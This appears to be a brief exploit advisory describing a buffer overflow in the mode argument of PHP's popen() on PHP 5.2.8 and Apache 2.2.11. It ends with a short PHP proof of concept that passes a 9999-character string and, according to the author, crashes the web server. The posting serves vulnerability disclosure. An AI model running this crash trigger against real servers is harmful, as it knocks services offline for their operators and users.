PHP Buffer Overflow(popen)
Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit (popen func)
Type: Remote and Local
Requirements for exploit: popen() enabled.
By: e.wiZz! Enes Mu?ić ew1zz@xxxxxxxxxxx
PHP Popen() function overview:
Popen function in php opens a pipe to a process executed by forking the command
given by command.
It was implementet since PHP 4 version.
popen ( string $command_to_execute , string $mode )
Second argument is vulnerable to buffer overflow.Reason why i mentioned Apache
here,is because
when we execute poc.php Apache HTTP server crash without any report in error
log.You can test on WAMP too,on CLI or browser.
Tested on: PHP 5.2.8/4.2.1/4.2.0
Apache 2.2.11
PoC:
<?php
$____buff=str_repeat("A",9999);
$handle = popen('/whatever/', $____buff);
echo $handle;
?>